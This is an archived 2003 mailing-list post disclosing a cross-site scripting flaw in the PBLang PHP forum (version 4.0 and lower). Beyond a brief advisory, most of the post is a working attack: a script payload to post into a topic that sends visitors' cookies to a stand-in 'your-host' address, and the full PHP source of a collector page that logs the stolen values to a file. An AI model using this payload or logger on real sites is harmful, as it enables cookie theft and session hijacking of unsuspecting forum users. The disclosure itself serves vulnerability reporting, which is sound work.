Pblang Forum Xss Vul

GovernmentSecurity.org > General GSO > Exploit & Vulnerability Mailing List Archives

GSecur

Jul 27 2003, 01:45 AM

PBLang is a web forum written by PHP language. A security vulnerability in

the product allows posting of HTML code and JavaScript into existing web

pages thus causing it to be executed on the client end (a Cross-Site

Scripting vuln).

|--------------------------------------------|

Vulnerable systems: PBLang forum

Version: 4.0 or lower

Website: http://pblang.drmartinus.de/

Problem: Cross Site Scripting (XSS)

|--------------------------------------------|

If someone inserts <script>`anyscript`</script> instead of the post's

content, the JavaScript code is executed by Internet Explorer or some

other web browsers. This allows stealing of cookie data and other

interesting things.

Exploit:

Inserting a new topic (or reply) with the following script, it will send

visitor's cookies to your host. The output is saved to http://your-

host/cookie.txt

*--------------------------------------------------------------------------

-------------------

<script>window.open("http://your-host/docs.php?docs="+escape

(document.cookie), "subwindows", "height=100,width=486")</script>

---------------------------------------------------------------------------

------------------*

Or insert every scripts - Java and HTML (ex: javascript:history.go(-1),

window.write('Hello world'), javascript:alert('Hi!!!'). )

* Code of docs.php:*

*-------------------------------------------------docs.php-----------------

-------------------------------

<?php

//Copyright by W_Hat (www.pcworldvn.com)

define ("LINE", "\r\n");

define ("HTML_LINE", "<br>");

function getvars($arr, $title)

{

$res = "";

$len = count($arr);

if ($len>0)

{

if (strlen($title)>0)

{

print("[--------$title--------]" . HTML_LINE);

$res .= "[--------$title--------]" . LINE;

}

foreach ($arr as $key => $value)

{

print("[$key]" . HTML_LINE);

print($arr[$key] . HTML_LINE);

$res .= "[$key]" . LINE . $arr[$key] . LINE;

}

}

return $res;

}

// get current date

$now = date("Y-m-d H:i:s");

// init

$myData = "[-----$now-----]" . LINE;

// get

$myData .= getvars($HTTP_GET_VARS, "");

// file

$file = $REMOTE_ADDR . "cookie.txt";

$mode = "r+";

if (!file_exists($file))

$mode = "w+";

$fp = fopen ($file, $mode);

fseek($fp, 0, SEEK_END);

fwrite($fp, $myData);

fclose($fp);

?>

-------------------------------------------------docs.php------------------

------------------------------*

Name: Quan Van Truong

E-Mail: quan_vu_208cn@yahoo.com

Occupation: Bug Hunter

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.